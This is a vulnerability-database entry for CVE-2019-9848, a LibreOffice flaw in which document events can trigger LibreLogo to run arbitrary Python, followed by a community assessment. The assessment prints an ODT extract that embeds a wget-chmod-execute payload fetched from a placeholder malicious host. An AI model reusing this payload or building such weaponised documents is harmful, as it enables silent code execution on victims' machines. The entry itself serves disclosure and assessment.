CVE-2019-9848

LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands. By using the document event feature to trigger LibreLogo to execute python contained within a document a malicious document could be constructed which would execute arbitrary python commands silently without warning. In the fixed versions, LibreLogo cannot be called from a document event handler. This issue affects: Document Foundation LibreOffice versions prior to 6.2.5.

Recent assessments:

kevthehermit at April 23, 2020 8:22pm UTC reported:

This forms the basis of a social engineering attack, It requires libre office and python installed. This means it is a limited pool of targe victims. However this is a common setup on Linux desktop environments which may make developers a target.

To exploit this vulnerability, an attacker creates a document with a text-written command and a hyperlink that, upon user mouseover, runs a program through the LibreLogo extension. When a user loads up the document in a program such as LibreOffice Writer, the macro is enabled automatically.

The hyperlink is set to include the macro LibreLogo:run. This in turn runs the previous text command through LibreLogo as if it’s attempting to use the information to create turtle vector graphics. This causes whatever is being called in the text command to run – be it malware, a program, or a malicious file download.

An example extract from an odt file can be seen below

   <txt ptr="0x4e9a180" id="3" symbol="11SwTextFrame" next="10" upper="2" txtNodeIndex="9">
    <infos>
     <bounds left="8181" top="1418" width="9638" height="299" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="299"/>
    </infos>
import os    <Text nLength="9" nType="POR_PARA" nHeight="299" nWidth="989" Portion="import os"/>
    <LineBreak nWidth="989" Line="import os"/>
    <Finish/>
   </txt>
   <txt ptr="0x7c6e450" id="10" symbol="11SwTextFrame" next="15" prev="3" upper="2" txtNodeIndex="10">
    <infos>
     <bounds left="8181" top="1717" width="9638" height="598" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="598"/>
    </infos>
os.system(“wget http://immersivemalware.bad:8001/payload.sh ; chmod +x payload.sh ; ./payload.sh”)    <Text nLength="84" nType="POR_PARA" nHeight="299" nWidth="9264" Portion="os.system(“wget http://malware.bad:8001/payload.sh ; chmod +x payload.sh ; "/>
    <LineBreak nWidth="9264" Line="os.system(“wget http://malware.bad:8001/payload.sh ; chmod +x payload.sh ; "/>
    <Text nLength="14" nType="POR_LAY" nHeight="299" nWidth="1458" Portion="./payload.sh”)"/>
    <LineBreak nWidth="1458" Line="./payload.sh”)"/>
    <Finish/>
   </txt>
   <txt ptr="0x4e2ac00" id="15" symbol="11SwTextFrame" prev="10" upper="2" txtNodeIndex="11">
    <infos>
     <bounds left="8181" top="2315" width="9638" height="299" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="299"/>
    </infos>
Run    <Text nLength="3" nType="POR_PARA" nHeight="299" nWidth="434" Portion="Run"/>
    <LineBreak nWidth="434" Line="Run"/>
    <Finish/>
   </txt>

Assessed Attacker Value: 1
Assessed Attacker Value: 1Assessed Attacker Value: 3